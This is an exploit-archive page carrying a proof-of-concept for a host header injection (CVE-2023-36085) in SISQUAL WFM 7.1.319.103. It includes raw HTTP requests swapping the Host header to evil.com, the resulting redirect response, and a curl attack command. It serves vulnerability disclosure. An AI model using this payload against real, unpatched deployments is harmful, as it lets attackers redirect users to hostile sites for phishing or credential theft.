SISQUAL WFM 7.1.319.103 Host Header Injection

SISQUAL WFM 7.1.319.103 Host Header Injection: Posted Feb 5, 2024; Authored by Omer Shaik; SISQUAL WFM version 7.1.319.103 suffers from a host header injection vulnerability.; tags | exploit; advisories | CVE-2023-36085; SHA-256 | 999fb99ba1eaa913b2e2c723b3bae263813d0e1ac23dcb4ed598112369465431; Download | Favorite | View

SISQUAL WFM 7.1.319.103 Host Header Injection

# Exploit Title: SISQUAL WFM 7.1.319.103 Host Header Injection
# Discovered Date: 17/03/2023
# Reported Date: 17/03/2023
# Exploit Author: Omer Shaik (unknown_exploit)
# Vendor Homepage: https://www.sisqualwfm.com
# Version: 7.1.319.103
# Tested on: SISQUAL WFM 7.1.319.103
# Affected Version: sisqualWFM - 7.1.319.103
# Fixed Version: sisqualWFM - 7.1.319.111
# CVE : CVE-2023-36085
# CVSS: 3.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)
# Category: Web Apps
# Reference: https://github.com/omershaik0/Handmade_Exploits/tree/main/SISQUALWFM-Host-Header-Injection-CVE-2023-36085



A proof-of-concept(POC) scenario that demonstrates a potential host header injection vulnerability in sisqualWFM version 7.1.319.103, specifically targeting the /sisqualIdentityServer/core endpoint. This vulnerability could be exploited by an attacker to manipulate webpage links or redirect users to another site with ease, simply by tampering with the host header.

****************************************************************************************************
Orignal Request
****************************************************************************************************
GET /sisqualIdentityServer/core/login HTTP/2
Host: sisqualwfm.cloud
Cookie:<cookie>
Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

****************************************************************************************************
Orignal Response
****************************************************************************************************
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://sisqualwfm.cloud/sisqualIdentityServer/core/
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Date: Wed, 22 Mar 2023 13:22:10 GMT
Content-Length: 0
****************************************************************************************************




██████╗  ██████╗  ██████╗
██╔══██╗██╔═══██╗██╔════╝
██████╔╝██║   ██║██║     
██╔═══╝ ██║   ██║██║     
██║     ╚██████╔╝╚██████╗
╚═╝      ╚═════╝  ╚═════╝
                



****************************************************************************************************
Request has been modified to redirect user to evil.com (Intercepted request using Burp proxy)
****************************************************************************************************
GET /sisqualIdentityServer/core/login HTTP/2
Host: evil.com
Cookie:<cookie>
Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

****************************************************************************************************
Response
****************************************************************************************************
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://evil.com/sisqualIdentityServer/core/
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Length: 0


****************************************************************************************************
Method of Attack
****************************************************************************************************

curl -k --header "Host: attack.host.com" "Domain Name + /sisqualIdentityServer/core" -vvv

****************************************************************************************************

Top Authors In Last 30 Days

Red Hat 272 files
indoushka 184 files
Jay Turla 150 files
Ubuntu 90 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Gentoo 25 files
Karn Ganeshen 23 files

File Archives

Systems

AIX (430)
Apple (2,115)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,126)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,592)
HPUX (881)
iOS (390)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,362)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (16,911)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,882)
UNIX (9,459)
UnixWare (188)
Windows (6,772)
Other

SISQUAL WFM 7.1.319.103 Host Header Injection

SISQUAL WFM 7.1.319.103 Host Header Injection

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

SISQUAL WFM 7.1.319.103 Host Header Injection

Share This

SISQUAL WFM 7.1.319.103 Host Header Injection

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems